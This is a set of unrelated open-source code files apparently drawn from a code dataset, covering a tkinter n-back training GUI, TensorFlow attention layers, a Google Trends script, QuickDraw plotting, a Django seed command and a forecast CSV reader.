column=1)\r\n \r\n speed_per_n_entry.bind('', self.__update_speed_per_n_function )\r\n speed_per_n_entry.bind('', self.__update_speed_per_n_function )\r\n\r\n def __update_letters_over_numbers_function(self,*args,**kwargs):\r\n self.master.master.session_settings.letters_over_numbers = self.__letters_over_numbers_BooleanVar.get()\r\n \r\n def __set_up_letters_over_numbers_widget(self):\r\n \"\"\"\r\n Set up a label and radiobutton for the letters_over_numbers setting\r\n NOte no input validation is needed here as the input values are only true/false - user cannot change that.\r\n \"\"\"\r\n letters_over_numbers_label = tkinter.Label(self,text=\"Numbers or letters for audio part of dual n back events: \", background = self['background'])\r\n letters_over_numbers_label.grid(row=1,column=0)\r\n \r\n self.__letters_over_numbers_BooleanVar = tkinter.BooleanVar(value=self.master.master.session_settings.letters_over_numbers)\r\n\r\n letters_over_numbers_Radiobutton_letters = tkinter.Radiobutton(self, background = self['background'], text=\"Letters\", variable = self.__letters_over_numbers_BooleanVar, value = True, command = self.__update_letters_over_numbers_function 
)\r\n letters_over_numbers_Radiobutton_letters.grid(row=1, column=1)\r\n \r\n letters_over_numbers_Radiobutton_numbers = tkinter.Radiobutton(self, background = self['background'], text=\"Numbers\", variable = self.__letters_over_numbers_BooleanVar, value = False, command = self.__update_letters_over_numbers_function )\r\n letters_over_numbers_Radiobutton_numbers.grid(row=1, column=2)\r\n \r\n def __update_rounds_per_n_back_session_function(self,*args,**kwargs):\r\n self.master.master.session_settings.rounds_per_n_back_session = self.__rounds_per_n_back_session_StringVar.get() \r\n \r\n def __set_up_rounds_per_n_back_session_widget(self):\r\n \"\"\"\r\n Set up a label and entrybox for the number of rounds per N back session\r\n \"\"\"\r\n rounds_per_n_back_session_label = tkinter.Label(self, text=\"Number of rounds per N back session : \", background = self[\"background\"])\r\n rounds_per_n_back_session_label.grid(row=2, column=0)\r\n \r\n self.__rounds_per_n_back_session_StringVar = tkinter.StringVar(value=self.master.master.session_settings.rounds_per_n_back_session)\r\n \r\n validate_rounds_per_n_back_session = self.register( self.__validate_int )\r\n\r\n rounds_per_n_back_session_entry = tkinter.Entry(self, textvariable = self.__rounds_per_n_back_session_StringVar, validate='all', validatecommand= (validate_rounds_per_n_back_session, '%P') )\r\n rounds_per_n_back_session_entry.grid(row=2, column=1)\r\n \r\n rounds_per_n_back_session_entry.bind('', self.__update_rounds_per_n_back_session_function)\r\n rounds_per_n_back_session_entry.bind('', self.__update_rounds_per_n_back_session_function)\r\n \r\n def __update_events_per_round_function(self,*args,**kwargs):\r\n self.master.master.session_settings.events_per_round = self.__events_per_round_StringVar.get()\r\n \r\n def __set_up_events_per_round_widget(self):\r\n \"\"\"\r\n Set up a label and entrybox for the number of events per N back round\r\n \"\"\"\r\n events_per_round_label = tkinter.Label(self, text=\"Events per N back round : \", background=self[\"background\"])\r\n events_per_round_label.grid(row=3, column=0)\r\n \r\n validate_events_per_round = self.register(self.__validate_int)\r\n \r\n self.__events_per_round_StringVar = tkinter.StringVar(value = self.master.master.session_settings.events_per_round)\r\n\r\n events_per_round_entry = tkinter.Entry(self, textvariable = self.__events_per_round_StringVar, validate='all', validatecommand =(validate_events_per_round, '%P') )\r\n events_per_round_entry.grid(row=3, column=1)\r\n \r\n events_per_round_entry.bind('', self.__update_events_per_round_function )\r\n events_per_round_entry.bind('', self.__update_events_per_round_function )\r\n\r\n\r\n def __update_n_back_grid_size_function(self,*args,**kwargs):\r\n self.master.master.session_settings.n_back_grid_size = self.__n_back_grid_size_StringVar.get() \r\n \r\n \r\n def __set_up_n_back_grid_size_widget(self):\r\n \"\"\"\r\n Set up a label and entrybox for the visual n back gridsize.\r\n \"\"\"\r\n n_back_grid_size_label = tkinter.Label(self, text=\"n back grid size : \", background=self[\"background\"])\r\n n_back_grid_size_label.grid(row=4, column=0)\r\n \r\n self.__n_back_grid_size_StringVar = tkinter.StringVar(value = self.master.master.session_settings.n_back_grid_size)\r\n \r\n validate_n_back_grid_size = self.register(self.__validate_int) # create wrapper around the python function for tcl intpreter. 
so python gives this to tkinter, which then takes it and does the inside, passes that pback to python.\r\n \r\n n_back_grid_size_entry = tkinter.Entry(self, textvariable = self.__n_back_grid_size_StringVar, validate='all', validatecommand=(validate_n_back_grid_size, '%P'))\r\n n_back_grid_size_entry.grid(row=4, column=1)\r\n \r\n n_back_grid_size_entry.bind('', self.__update_n_back_grid_size_function )\r\n n_back_grid_size_entry.bind('', self.__update_n_back_grid_size_function )\r\n ############################################## correct below for classes above \r\nclass main_GUI_Menu(tkinter.Menu):\r\n \"\"\"\r\n Create the menu of the GUI\r\n ##########\r\n INPUTS:\r\n root = tkinter widget that is the parent of the menus\r\n in this case this should be the self instance of the \r\n main_GUI class(a child class, not to be confused with child widget,\r\n of the tkinter.TK() tlc/tk interpreter class)\r\n\r\n \"\"\"\r\n \r\n def __init__(self, root, *args, **kwargs):\r\n \r\n tkinter.Menu.__init__(self, master = root, *args,**kwargs) #initialise the Menu class.\r\n #self.root = root # not sure if this is good practice to have, exposing the root property to access, but it might be useful?\r\n self.root = root\r\n \r\n cascading_File_Menu = self.create_File_Menu()\r\n self.add_cascade( label=\"File\", menu = cascading_File_Menu)\r\n self.add_command(label=\"N Back Session\", command = self.select_main_screen )\r\n self.add_command(label=\"Configuration Settings\", command = self.select_configuration_screen ) #REWRITE THESE TO USE CREATE DESTROY\r\n self.root.config(menu = self)\r\n \r\n def select_configuration_screen(self):\r\n \"\"\"create the configuration frame.\r\n We want to create and destroy this so that the configuration frame cannot accidentaly be selected when in the main n back screen,\r\n thus preventing keyboard events from triggering the n back game actions.\r\n Once cerated the frame is raised to the top so it is always visible.\r\n \r\n \"\"\"\r\n self.root.configuration_Frame = Configuration_Frame( self.root.main_Frame)\r\n self.root.configuration_Frame.tkraise() \r\n \r\n def select_main_screen(self):\r\n \"\"\"when selecting the n back screen, we want to check if the configuration screen exists and if so delete it.\r\n however before deleting it we update all settings to make sure.\r\n Then raise the main screen to the top for visbility.\r\n \"\"\"\r\n try:\r\n self.root.configuration_Frame.update_all_configuration_settings()\r\n self.root.configuration_Frame.destroy()\r\n finally: \r\n self.root.N_Back_Session_Frame.tkraise()\r\n \r\n \r\n def create_File_Menu(self):\r\n \"\"\"\r\n Create the drop down cascading menu for the file menu.\r\n This must be created before it can be added as a whole menu object to the filemenu.\r\n Takes the main_GUI_Menu class instance as its parent/master object in the tkinter heirachy.\r\n ##########\r\n INPUTS:\r\n self = the tk widget that is to be the parent of the cascading file menu. 
\r\n RETURNS:\r\n cascading_File_Menu = instance of the file menu.\r\n \"\"\"\r\n cascading_File_Menu = tkinter.Menu(self, tearoff=0) \r\n cascading_File_Menu.add_command(label=\"New Session\", command = self.placeholder_Command )\r\n cascading_File_Menu.add_command(label=\"Save Session\", command = self.save_Session_Data )\r\n cascading_File_Menu.add_command(label=\"Load Session\", command = self.load_Session_Data )\r\n \r\n cascading_File_Menu.add_command(label=\"Exit\", command = self.exit_GUI )\r\n \r\n return cascading_File_Menu\r\n \r\n \r\n def placeholder_Command(self):\r\n print(\"hello, this is a placeholder command that is not implimented yet\")\r\n return None\r\n \r\n \r\n def save_Session_Data(self, from_Quitting=False):\r\n \"\"\"Save the data for the current N back session.\r\n Data to be saved: Number of played rounds, score, N back per round, current N back level.\r\n plus ALL configuration data\r\n All information from the current round is to be thrown away, as saving this is not \r\n compatabile with the N back process- i.e. it would require longer term memory, \r\n not working memeory and thus invalidates the purpose of the training.\r\n \r\n The instance of each session should be a separate class instantiated by the GUI,\r\n Something like self.current_Session\r\n Therefore this function, once completed, will refer to this to get the scores, ect.\r\n ##########\r\n INPUTS:\r\n from_Quitting = boolean flag to indicate whether the data is being saved due to quitting.\r\n if this is true then a, ideally hidden, file should also be created with either\r\n a duplicate of the saved data (assuming the user is allowed to name the file,etc.)\r\n or with the location and filename of the saved, partially complete, session.\r\n Thus upon opening the program, it can check for the prescence of this hidden file \r\n and ask the user if they wish to resume the last session where they left off.\r\n OUTPUTS:\r\n None \r\n \"\"\"\r\n self.placeholder_Command()\r\n \r\n return None\r\n \r\n def new_Session(self):\r\n \"\"\"\r\n Start a new set of rounds for the N back training.\r\n This is done by instantiating the class for a current session.\r\n ##########\r\n INPUTS:\r\n None\r\n OUTPUTS:\r\n None\r\n \"\"\"\r\n self.placeholder_Command() \r\n \r\n return None\r\n \r\n def load_Session_Data(self):\r\n \"\"\"\r\n Load the data for a prior session.\r\n saved data should contain:Number of played rounds, score, N back per round, current N back level.\r\n plus ALL configuration data in the savefile.\r\n This is done by instantiating the class for a current session.\r\n ##########\r\n INPUTS:\r\n None\r\n OUTPUTS:\r\n None\r\n \"\"\"\r\n self.placeholder_Command()\r\n return None\r\n \r\n def exit_GUI(self):\r\n \"\"\"Check that the user wants to quit, and save data of the current session.\r\n Then Exit the GUI if the user selects yes to the quit question.\r\n ##########\r\n INPUTS:\r\n None\r\n OUTPUTS:\r\n None\r\n \"\"\"\r\n \r\n #create dialog box to ask user if they would like to save the session data before exiting\r\n #if yes, go to save data function\r\n #if no, tell them the drones will still dream about them\r\n quit_True_False = tkinter.simpledialog.messagebox.askyesno(title=\"QUIT?\",message=\"Are you sure you would like to quit?\\n(Session data will be autosaved)\")\r\n \r\n if quit_True_False==True:\r\n self.save_Session_Data()\r\n #exit the GUI by desotroying the main_Frame widget\r\n \r\n self.root.destroy()\r\n \r\n return None\r\n\r\nclass main_GUI(tkinter.Tk):\r\n \r\n 
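The menu above swaps screens by stacking frames in the same grid cell and calling tkraise(). A minimal self-contained sketch of that pattern follows, under the assumption of a plain Tk root rather than this application's own classes.
import tkinter as tk

root = tk.Tk()
frames = {}
for name, colour in [('main', 'white'), ('config', 'light blue')]:
    f = tk.Frame(root, width=200, height=120, background=colour)
    f.grid(row=0, column=0)  # both frames share the same grid cell
    frames[name] = f
frames['config'].tkraise()  # show the configuration frame
frames['main'].tkraise()    # switch back to the main frame
root.destroy()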
def __init__(self, *args, **kwargs):\r\n        tkinter.Tk.__init__(self, *args, **kwargs)\r\n        # this creates the TK interpreter that converts the python tkinter commands into TK commands that are then carried out to create the GUI\r\n        #root is the highest level parent (master) widget, all other widgets must be a child (slave) of this widget\r\n\r\n        self.main_menu = main_GUI_Menu(self)\r\n        \r\n        self.main_Frame = self.create_Main_Frame(self)\r\n        \r\n        self.session_settings = Session_Settings.n_Back_Settings()\r\n        \r\n        self.N_Back_Session_Frame = n_back_session_Frame(self.main_Frame)\r\n        \r\n        self.resizable(False, False) # prevent window resizing\r\n        \r\n        #the mainloop is the TK event loop that actually runs the GUI\r\n        self.mainloop()\r\n        \r\n        \r\n        \r\n\r\n    def create_Main_Frame(self, root):\r\n        \"\"\"Sub-function to create the main frame that is to contain all other elements of the GUI.\r\n        This is to compartmentalise the parameters, etc.\r\n        ##########\r\n        INPUTS:\r\n            root = root instance of the TK interpreter\r\n        OUTPUTS:\r\n            main_Frame = instance of the TK Frame widget\r\n        \"\"\"\r\n        # A child main_frame frame widget is created, with the parent widget being the root widget, which is passed to this main_GUI class on instantiation.\r\n        # The Frame instance is stored as a property of the main_GUI class.\r\n        #A frame widget is a rectangular region on the screen and is used as a \"geometry master\" for other widgets.\r\n        #Basically it is a container, or a FRAME, for other widgets; the placement of other widgets inside of the\r\n        #frame allows for more ordered control and, well, placement.\r\n        main_Frame = tkinter.Frame(root)  \r\n        \r\n        main_Frame.grid(row=0, column=0) #must use the grid implementation in the parent widget otherwise no child widgets will display - can also use the pack\r\n        #or place placer methods, but it is allegedly not advised to mix different methods in the same program\r\n        main_Frame['borderwidth'] = 2\r\n        main_Frame['relief'] = 'raised'\r\n        main_Frame[\"height\"] = 802\r\n        main_Frame[\"width\"] = 802\r\n        main_Frame.grid_propagate(False)\r\n        \r\n        return main_Frame\r\n\r\n\r\n    \r\ntest = main_GUI()\r\n    \r\n","sub_path":"Main_GUI.py","file_name":"Main_GUI.py","file_ext":"py","file_size_in_byte":25055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"508473837","text":"from src.nn_utils.general import get_last_state, exp_mask_for_high_rank, mask_for_high_rank\nfrom src.nn_utils.nn import linear, get_logits, pooling_with_mask, softsel, feature_combination, dropout,\\\n    bn_dense_layer\nfrom src.nn_utils.rnn_cell import SwitchableDropoutWrapper\nfrom src.nn_utils.rnn import dynamic_rnn, bidirectional_dynamic_rnn\nimport tensorflow as tf\nfrom src.nn_utils.general import get_last_state, add_reg_without_bias\n\n\ndef traditional_attention(rep_tensor, rep_mask, scope=None,\n                          keep_prob=1., is_train=None, wd=0., activation='elu',\n                          tensor_dict=None, name=None):\n    bs, sl, vec = tf.shape(rep_tensor)[0], tf.shape(rep_tensor)[1], tf.shape(rep_tensor)[2]\n    ivec = rep_tensor.get_shape()[2]\n    with tf.variable_scope(scope or 'traditional_attention'):\n        rep_tensor_map = bn_dense_layer(rep_tensor, ivec, True, 0., 'bn_dense_map', activation,\n                                        False, wd, keep_prob, is_train)\n\n        rep_tensor_logits = get_logits([rep_tensor_map], None, False, scope='self_attn_logits',\n                                       mask=rep_mask, input_keep_prob=keep_prob, is_train=is_train)  # bs,sl\n        attn_res = softsel(rep_tensor, rep_tensor_logits, rep_mask)  # bs,vec\n\n        # save attn\n        if tensor_dict is not None and name is 
not None:\n tensor_dict[name] = tf.nn.softmax(rep_tensor_logits)\n\n return attn_res\n\n\ndef multi_dimensional_attention(rep_tensor, rep_mask, scope=None,\n keep_prob=1., is_train=None, wd=0., activation='elu',\n tensor_dict=None, name=None):\n bs, sl, vec = tf.shape(rep_tensor)[0], tf.shape(rep_tensor)[1], tf.shape(rep_tensor)[2]\n ivec = rep_tensor.get_shape()[2]\n with tf.variable_scope(scope or 'multi_dimensional_attention'):\n map1 = bn_dense_layer(rep_tensor, ivec, True, 0., 'bn_dense_map1', activation,\n False, wd, keep_prob, is_train)\n map2 = bn_dense_layer(map1, ivec, True, 0., 'bn_dense_map2', 'linear',\n False, wd, keep_prob, is_train)\n map2_masked = exp_mask_for_high_rank(map2, rep_mask)\n\n soft = tf.nn.softmax(map2_masked, 1) # bs,sl,vec\n attn_output = tf.reduce_sum(soft * rep_tensor, 1) # bs, vec\n\n # save attn\n if tensor_dict is not None and name is not None:\n tensor_dict[name] = soft\n\n return attn_output\n\n\ndef directional_attention_with_dense(rep_tensor, rep_mask, direction=None, scope=None,\n keep_prob=1., is_train=None, wd=0., activation='elu',\n extra_mask=None,\n tensor_dict=None, name=None):\n def scaled_tanh(x, scale=5.):\n return scale * tf.nn.tanh(1./scale * x)\n\n bs, sl, vec = tf.shape(rep_tensor)[0], tf.shape(rep_tensor)[1], tf.shape(rep_tensor)[2]\n ivec = rep_tensor.get_shape()[2]\n with tf.variable_scope(scope or 'directional_attention_%s' % direction or 'diag'):\n # mask generation\n sl_indices = tf.range(sl, dtype=tf.int32)\n sl_col, sl_row = tf.meshgrid(sl_indices, sl_indices)\n if direction is None:\n direct_mask = tf.cast(tf.diag(- tf.ones([sl], tf.int32)) + 1, tf.bool)\n else:\n if direction == 'forward':\n direct_mask = tf.greater(sl_row, sl_col)\n else:\n direct_mask = tf.greater(sl_col, sl_row)\n direct_mask_tile = tf.tile(tf.expand_dims(direct_mask, 0), [bs, 1, 1]) # bs,sl,sl\n rep_mask_tile = tf.tile(tf.expand_dims(rep_mask, 1), [1, sl, 1]) # bs,sl,sl\n attn_mask = tf.logical_and(direct_mask_tile, rep_mask_tile) # bs,sl,sl\n if extra_mask is not None:\n attn_mask = tf.logical_and(attn_mask, extra_mask)\n\n # non-linear\n rep_map = bn_dense_layer(rep_tensor, ivec, True, 0., 'bn_dense_map', activation,\n False, wd, keep_prob, is_train)\n rep_map_tile = tf.tile(tf.expand_dims(rep_map, 1), [1, sl, 1, 1]) # bs,sl,sl,vec\n rep_map_dp = dropout(rep_map, keep_prob, is_train)\n\n # attention\n with tf.variable_scope('attention'): # bs,sl,sl,vec\n f_bias = tf.get_variable('f_bias',[ivec], tf.float32, tf.constant_initializer(0.))\n dependent = linear(rep_map_dp, ivec, False, scope='linear_dependent') # bs,sl,vec\n dependent_etd = tf.expand_dims(dependent, 1) # bs,1,sl,vec\n head = linear(rep_map_dp, ivec, False, scope='linear_head') # bs,sl,vec\n head_etd = tf.expand_dims(head, 2) # bs,sl,1,vec\n\n logits = scaled_tanh(dependent_etd + head_etd + f_bias, 5.0) # bs,sl,sl,vec\n\n logits_masked = exp_mask_for_high_rank(logits, attn_mask)\n attn_score = tf.nn.softmax(logits_masked, 2) # bs,sl,sl,vec\n attn_score = mask_for_high_rank(attn_score, attn_mask)\n\n attn_result = tf.reduce_sum(attn_score * rep_map_tile, 2) # bs,sl,vec\n\n with tf.variable_scope('output'):\n o_bias = tf.get_variable('o_bias',[ivec], tf.float32, tf.constant_initializer(0.))\n # input gate\n fusion_gate = tf.nn.sigmoid(\n linear(rep_map, ivec, True, 0., 'linear_fusion_i', False, wd, keep_prob, is_train) +\n linear(attn_result, ivec, True, 0., 'linear_fusion_a', False, wd, keep_prob, is_train) +\n o_bias)\n output = fusion_gate * rep_map + (1-fusion_gate) * attn_result\n output = 
mask_for_high_rank(output, rep_mask)\n\n # save attn\n if tensor_dict is not None and name is not None:\n tensor_dict[name + '_dependent'] = dependent\n tensor_dict[name + '_head'] = head\n tensor_dict[name] = attn_score\n tensor_dict[name + '_gate'] = fusion_gate\n return output\n\n\n# -------------- rnn --------------\ndef contextual_bi_rnn(tensor_rep, mask_rep, hn, cell_type, only_final=False,\n wd=0., keep_prob=1.,is_train=None, scope=None):\n \"\"\"\n fusing contextual information using bi-direction rnn\n :param tensor_rep: [..., sl, vec]\n :param mask_rep: [..., sl]\n :param hn:\n :param cell_type: 'gru', 'lstm', basic_lstm' and 'basic_rnn'\n :param only_final: True or False\n :param wd:\n :param keep_prob:\n :param is_train:\n :param scope:\n :return:\n \"\"\"\n with tf.variable_scope(scope or 'contextual_bi_rnn'): # correct\n reuse = None if not tf.get_variable_scope().reuse else True\n #print(reuse)\n if cell_type == 'gru':\n cell_fw = tf.contrib.rnn.GRUCell(hn, reuse=reuse)\n cell_bw = tf.contrib.rnn.GRUCell(hn, reuse=reuse)\n elif cell_type == 'lstm':\n cell_fw = tf.contrib.rnn.LSTMCell(hn, reuse=reuse)\n cell_bw = tf.contrib.rnn.LSTMCell(hn, reuse=reuse)\n elif cell_type == 'basic_lstm':\n cell_fw = tf.contrib.rnn.BasicLSTMCell(hn, reuse=reuse)\n cell_bw = tf.contrib.rnn.BasicLSTMCell(hn, reuse=reuse)\n elif cell_type == 'basic_rnn':\n cell_fw = tf.contrib.rnn.BasicRNNCell(hn, reuse=reuse)\n cell_bw = tf.contrib.rnn.BasicRNNCell(hn, reuse=reuse)\n else:\n raise AttributeError('no cell type \\'%s\\'' % cell_type)\n cell_dp_fw = SwitchableDropoutWrapper(cell_fw,is_train,keep_prob)\n cell_dp_bw = SwitchableDropoutWrapper(cell_bw,is_train,keep_prob)\n\n tensor_len = tf.reduce_sum(tf.cast(mask_rep, tf.int32), -1) # [bs]\n\n (outputs_fw, output_bw), _ = bidirectional_dynamic_rnn(\n cell_dp_fw, cell_dp_bw, tensor_rep, tensor_len,\n dtype=tf.float32)\n rnn_outputs = tf.concat([outputs_fw,output_bw],-1) # [...,sl,2hn]\n\n if wd > 0:\n add_reg_without_bias()\n if not only_final:\n return rnn_outputs # [....,sl, 2hn]\n else:\n return get_last_state(rnn_outputs, mask_rep) # [...., 2hn]\n\n\n# -------------- emb mat--------------\ndef generate_embedding_mat(dict_size, emb_len, init_mat=None, extra_mat=None,\n extra_trainable=False, scope=None):\n \"\"\"\n generate embedding matrix for looking up\n :param dict_size: indices 0 and 1 corresponding to empty and unknown token\n :param emb_len:\n :param init_mat: init mat matching for [dict_size, emb_len]\n :param extra_mat: extra tensor [extra_dict_size, emb_len]\n :param extra_trainable:\n :param scope:\n :return: if extra_mat is None, return[dict_size+extra_dict_size,emb_len], else [dict_size,emb_len]\n \"\"\"\n with tf.variable_scope(scope or 'gene_emb_mat'):\n emb_mat_ept_and_unk = tf.constant(value=0, dtype=tf.float32, shape=[2, emb_len])\n if init_mat is None:\n emb_mat_other = tf.get_variable('emb_mat',[dict_size - 2, emb_len], tf.float32)\n else:\n emb_mat_other = tf.get_variable(\"emb_mat\",[dict_size - 2, emb_len], tf.float32,\n initializer=tf.constant_initializer(init_mat[2:], dtype=tf.float32,\n verify_shape=True))\n emb_mat = tf.concat([emb_mat_ept_and_unk, emb_mat_other], 0)\n\n if extra_mat is not None:\n if extra_trainable:\n extra_mat_var = tf.get_variable(\"extra_emb_mat\",extra_mat.shape, tf.float32,\n initializer=tf.constant_initializer(extra_mat,\n dtype=tf.float32,\n verify_shape=True))\n return tf.concat([emb_mat, extra_mat_var], 0)\n else:\n #with tf.device('/cpu:0'):\n extra_mat_con = tf.constant(extra_mat, 
dtype=tf.float32)\n                return tf.concat([emb_mat, extra_mat_con], 0)\n        else:\n            return emb_mat\n\n\n","sub_path":"SICK_rl_pub/src/nn_utils/integration_func.py","file_name":"integration_func.py","file_ext":"py","file_size_in_byte":10077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"389670873","text":"import pandas as pd \r\nfrom pytrends.request import TrendReq\r\nfrom datetime import date\r\n\r\ndef llamar_api_gt (timeframe, ticker):\r\n    pytrend = TrendReq()\r\n    kw_list = [ticker]\r\n    pytrend.build_payload(kw_list, cat=0, timeframe=timeframe)\r\n    data = pytrend.interest_over_time()\r\n    print(data)\r\n    return data\r\n\r\ndef obtener_media_semanas (df):\r\n    medias = []\r\n    i = 0\r\n    descuadre = 1\r\n    for x in range(len(df)):\r\n        descuadre += 1\r\n        i += df.iloc[x,0]\r\n        if descuadre%7 == 0 and x != 0:\r\n            medias.append(i/7)\r\n            i = 0\r\n\r\n    print(\"Weekly averages:\\n\",medias)\r\n    return medias\r\n\r\ndef get_trend (ticker):\r\n    timeframe = 'today 3-m' # Data for the last three months \r\n    data = llamar_api_gt(timeframe,ticker)\r\n    medias = obtener_media_semanas(data)\r\n    diff = []\r\n    for i in range(1,len(medias)):\r\n        diff.append ( ( medias[i] - medias[i-1] ) * medias[i-1] )\r\n    print(\"Weighted differences:\\n\",diff)\r\n\r\n    rango = 0\r\n    for d in diff:\r\n        rango += abs(d)\r\n    print(\"The total range is:\\n\",rango)\r\n\r\n    rango_actual = 0\r\n    simbolo_actual = 0\r\n    rango_positivo = 0\r\n    for d in diff [-1:len(diff)-5:-1]:\r\n        rango_positivo += d\r\n        rango_actual += abs(d)\r\n    print(\"The current range is:\\n\",rango_actual)\r\n    print(\"The positive range is:\\n\",rango_positivo)\r\n    ratio = rango_actual/rango # How much the latest volume changes contribute relative to the total\r\n    print(\"Trends ratio:\\n\", ratio)\r\n    if(rango_positivo>0):\r\n        return ratio\r\n    else:\r\n        return ratio * -1\r\n\r\n    \r\n\r\n#print(\"The selected data point is: \",data.iloc[0,0])\r\n#otrodata = data.loc['2021-03-01':'2021-03-02',:]\r\n#print(otrodata)\r\n\r\n\"\"\"todayaux = date.today()\r\ntoday = todayaux.strftime(\"%Y-%m-%d\")\r\nprint(\"Today's date:\", today)\r\ntimeframe2 = '2020-12-01 2021-05-06'\r\ntimeframe3 = '2021-04-01 2021-05-01'\r\ntimeframe4 = '2021-03-01 2021-04-01'\"\"\"","sub_path":"takeprofit/mainapp/googletrends.py","file_name":"googletrends.py","file_ext":"py","file_size_in_byte":1955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"572999465","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n### load the data\napple = np.load('data/full_numpy_bitmap_apple.npy')\naxe = np.load('data/full_numpy_bitmap_axe.npy')\nbutterfly = np.load('data/full_numpy_bitmap_butterfly.npy')\nfan = np.load('data/full_numpy_bitmap_fan.npy')\nhat = np.load('data/full_numpy_bitmap_hat.npy')\n\n### data information\napple = np.c_[apple, np.zeros(len(apple))]\nprint(apple.shape)\n\n\ndef plot_samples(input_array, rows=4, cols=5, title=''):\n    '''\n    Function to plot 28x28 pixel drawings that are stored in a numpy array.\n    Specify how many rows and cols of pictures to display (default 4x5). 
\n    If the array contains fewer images than subplots selected, surplus subplots remain empty.\n    '''\n    \n    fig, ax = plt.subplots(figsize=(cols,rows))\n    ax.axis('off')\n    plt.title(title)\n\n    for i in list(range(0, min(len(input_array),(rows*cols)) )):      \n        a = fig.add_subplot(rows,cols,i+1)\n        imgplot = plt.imshow(input_array[i,:784].reshape((28,28)), cmap='gray_r', interpolation='nearest')\n        plt.xticks([])\n        plt.yticks([])\n    plt.show()\n\nimport itertools\n\ndef plot_confusion_matrix(cm, classes,\n                          normalize=False,\n                          title='Confusion matrix',\n                          cmap=plt.cm.Blues):\n    \"\"\"\n    This function prints and plots the confusion matrix.\n    Normalization can be applied by setting `normalize=True`.\n    \"\"\"\n    plt.imshow(cm, interpolation='nearest', cmap=cmap)\n    plt.title(title)\n    plt.colorbar()\n    tick_marks = np.arange(len(classes))\n    plt.xticks(tick_marks, classes, rotation=45)\n    plt.yticks(tick_marks, classes)\n\n    if normalize:\n        cm = np.round(cm.astype('float') / cm.sum(axis=1)[:, np.newaxis], 5)\n        print(\"Normalized confusion matrix\")\n    else:\n        print('Confusion matrix, without normalization')\n\n    print(cm)\n\n    thresh = cm.max() / 2.\n    for i, j in itertools.product(range(cm.shape[0]), range(cm.shape[1])):\n        plt.text(j, i, cm[i, j],\n                 horizontalalignment=\"center\",\n                 color=\"white\" if cm[i, j] > thresh else \"black\")\n\n    plt.tight_layout()\n    plt.ylabel('True label')\n    plt.xlabel('Predicted label')\n\nplot_samples(apple, title='Sample apple drawings\\n')\n","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":2291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"534950927","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 11 14:36:48 2020\n\n@author: philc\n\"\"\"\n\nimport sys\nimport os\n\nfileName = sys.argv[1]\nfileRead = open(fileName,'r')\nnew_file = open(fileName + \".split\", \"w\") # Argh, I overwrote everything!\n\n#file = open(\"pos_reference.txt.lima\", \"r\")\n\nlignes = fileRead.readlines() # Iterate over the lines of the source file\nfor ligne in lignes:\n\twords = ligne.split(' ')\n\n\tligneSortie = \"\"\n\tcpt = 0\n\ttxt = \"\"\n\tfor word in words:\n\t\ttxt += word\n\n\t\tif '_' in word:\n\t\t\t\n\t\t\tcpt += 1\n\t\t\tif cpt < len(words):\n\t\t\t\ttoReplace = txt.split('_')\n\t\t\t\tligneSortie += toReplace[0] + '\\t' + toReplace[1] + '\\n'\n\t\t\telse:\n\t\t\t\tligneSortie += \".\\t.\\n\\n\"\n\t\t\ttxt = \"\"\n\t\telse:\n\t\t\ttxt += ' '\n\t\t\n\tnew_file.write(ligneSortie)\n\nnew_file.close()\nfileRead.close()\n\n'''\nfileRead = open(fileName + \".split\", \"r\")\nnew_file = open(fileName, 'w')\n\nlignes = fileRead.readlines()\nligneSortie = \"\"\nfor ligne in lignes:\n\tligneSortie += ligne\n\nnew_file.write(ligneSortie)\n\nnew_file.close()\nfileRead.close()\n\nos.remove(fileName + \".split\")\n'''\n\n","sub_path":"src/script-split-postagger_colonne.py","file_name":"script-split-postagger_colonne.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"70953925","text":"# -- encoding: UTF-8 --\nimport os\n\nfrom django.contrib.auth import get_user_model\nfrom django.core.management.base import BaseCommand\nfrom django.core.management.commands.migrate import Command as MigCommand\nfrom django.db.utils import DEFAULT_DB_ALIAS\n\nfrom wurst.core.models import Project\n\nfrom .wurst_import_schema import Command as WISCommand\n\n\nclass Command(BaseCommand):\n    \"\"\"\n    Seed the application with models 
suitable for development.\n \"\"\"\n\n def handle(self, *args, **options):\n MigCommand().handle(database=DEFAULT_DB_ALIAS, app_label=(), **options)\n schema_path = os.path.join(\n os.path.dirname(__file__),\n \"..\", # management\n \"..\", # wurst\n \"schemata\",\n \"basic.toml\"\n )\n WISCommand().handle(file=schema_path, **options)\n user_model = get_user_model()\n if not user_model.objects.filter(is_superuser=True).exists():\n user_model.objects.create_superuser(\"admin\", \"admin@example.com\", \"admin\")\n self.stdout.write(\"Created superuser (username = admin, password = admin)\")\n if not Project.objects.exists():\n Project.objects.create(slug=\"test\", name=\"Test\", prefix=\"T-\")\n self.stdout.write(\"Created Test project\")\n","sub_path":"wurst/core/management/commands/wurst_dev_seed.py","file_name":"wurst_dev_seed.py","file_ext":"py","file_size_in_byte":1280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"647187732","text":"import os\nimport csv\n\nfrom park_api import env\n\n\ndef find_forecast(lot_id, time_from, time_to):\n try:\n csv_path = os.path.join(env.APP_ROOT, \"forecast_data\", lot_id + \".csv\")\n\n with open(csv_path) as csvfile:\n data = {\n \"version\": 1.0,\n \"data\": {}\n }\n for row in csv.reader(csvfile):\n if time_from <= row[0] <= time_to:\n data[\"data\"][row[0]] = row[1]\n return data\n except FileNotFoundError:\n return None\n","sub_path":"park_api/forecast.py","file_name":"forecast.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"479410443","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: 